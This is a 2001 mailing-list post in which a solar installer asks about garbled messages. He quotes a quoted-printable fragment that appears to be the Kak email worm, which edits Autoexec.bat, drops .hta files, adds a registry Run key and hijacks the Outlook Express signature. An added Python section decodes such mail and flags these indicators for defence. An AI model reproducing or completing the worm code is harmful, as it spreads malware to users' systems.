virus concern [RE-wrenches]
carl reuter
creuter at rocketmail.com
Sat Feb 10 12:09:31 PST 2001
Funny this subject should appear, because I was looking at the latest
postings from the group while at a friend's house who happens to work
for Netscape, and asked him to explain why so much of the messages
contained unreadable gibberish to my untrained eye. The one
section I showed him contained something about autoexec.bat that he
said was a commonly used means of a hacker to try and enter another
person's system through the mail via Outlook Express, just as one of
you mentioned concerning worms. I read my mail through a web based
email reader so that danger doesn't concern me, but it's annoying to
have to sift all the extra non pertinent stuff out. Apparently the
stuff that's being generated in HTML can be turned off, but I haven't
found that option in Yahoo mail and apologize if my postings are
sending that. I have no idea what it looks like at anyone else's site,
but I'll see long strings of code after the header says that part of
the message is in MIME format. I sent the whole last posting to my
buddy for analysis and if anything interesting comes of it I'll
forward it. Here's a sample of what I've been seeing. The tenth line
down containing Autoexec.bat was the part my friend was concerned
about. Forgive my ignorance if this is all standard stuff.

Carl Reuter
mye=3Dnew =
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew
=
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\=
\\StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists=
(kfr))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.Fil=
eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
.GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
)?wd+'MENUD=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('=
@echo off>'+pth);t1.WriteLine('del =
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\Identities\\\\'+id=
n+'\\\\Software\\\\Microsoft\\\\Outlook =
Express\\\\5.0';sg=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
"Default =
Signature\"=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
\\00000000]');t2.WriteLine('\"name\"=3D\"Signature =
#1\"');t2.WriteLine('\"type\"=3Ddword:00000002');t2.WriteLine('\"text\"=3D=
\"\"');t2.Write('\"file\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.Wri=
teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
L_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]')=
;t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.h=
ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><B=
ODY><DIV
=====
Land and Sea Solar, Renewable Energy Systems. Email: carl at landandseasolar.com. Phone:831-252-5040 website:http://www.landandseasolar.com
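The "gibberish" Carl describes is a MIME part in quoted-printable encoding: every "=" is written as "=3D" and long lines are broken with a trailing "=" (a soft line break), so script that was readable to the sender becomes a wall of "=3D" and "=" fragments in a reader that does not decode the part. The following is an added example, not code from the post or from the RE-wrenches list, showing how a MIME-aware reader decodes such a part with Python's standard library and how a simple defensive check can flag the things Carl's friend noticed (script in an HTML body, a reference to Autoexec.bat, an .hta file, a registry Run key). The two messages are constructed for the example; the indicator list is an assumption for illustration, not a complete signature.

```python
import email
from email import policy

# Constructed sample, modelled on the kind of text the post quotes: an HTML
# part in quoted-printable, where "=3D" stands for "=" and a line ending in
# "=" is a soft line break that the decoder joins with the next line.
SAMPLE_QP = (
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n"
    b"\r\n"
    b"<HTML><BODY><SCRIPT>x=3Dnew =\r\n"
    b"String('abc');aeb=3D'C:\\\\Autoexec.bat';</SCRIPT>=\r\n"
    b"<P>hello</P></BODY></HTML>\r\n"
)

# Constructed benign sample: ordinary text that also uses "=3D" and a soft
# line break, to show that the encoding itself is not the problem.
BENIGN_QP = (
    b"Content-Type: text/plain; charset=iso-8859-1\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n"
    b"\r\n"
    b"Price =3D 35 dollars a year, see http://personal.mail.yahoo.com/ =\r\n"
    b"for details.\r\n"
)

# Assumed indicator list for this example (lower-case substrings of the
# decoded body). These are the items the post's sample contains; a real
# mail filter would use a maintained signature set instead.
INDICATORS = (
    "<script",              # active content inside an HTML mail body
    ".hta",                 # HTML Application file, runs with the user's rights
    "autoexec.bat",         # startup batch file edited to run something at boot
    "currentversion\\run",  # registry autostart key
)


def decode_body(raw: bytes) -> str:
    """Parse one MIME message and return its body with quoted-printable undone."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    payload = msg.get_payload(decode=True)  # decode=True removes the QP encoding
    charset = msg.get_content_charset() or "ascii"
    return payload.decode(charset, errors="replace")


def find_indicators(body: str) -> list:
    """Return the indicators present in a decoded body, in INDICATORS order."""
    low = body.lower()
    return [ind for ind in INDICATORS if ind in low]


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_QP), ("benign", BENIGN_QP)):
        body = decode_body(raw)
        print(label, "decoded:", body.strip())
        print(label, "indicators:", find_indicators(body))
```

Running it prints the sample body as readable HTML with the `=3D` and soft breaks gone, and lists `<script` and `autoexec.bat` for the constructed sample while the benign text message yields nothing. The check runs on the decoded body on purpose: matching the raw quoted-printable text would miss an indicator that happens to be split across a soft line break.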
- - - - - - -
To send a message:
RE-wrenches at topica.com
The archive of previous messages:
http://www.topica.com/lists/RE-wrenches/
To unsubscribe send a message to:
RE-wrenches-unsubscribe at topica.com
To check out the other RE-Wrench participants:
www.mrsharkey.com/wrenches/index.html
Hosted by Home Power magazine:
www.homepower.com
For info contact list moderator by email:
michael.welch at homepower.com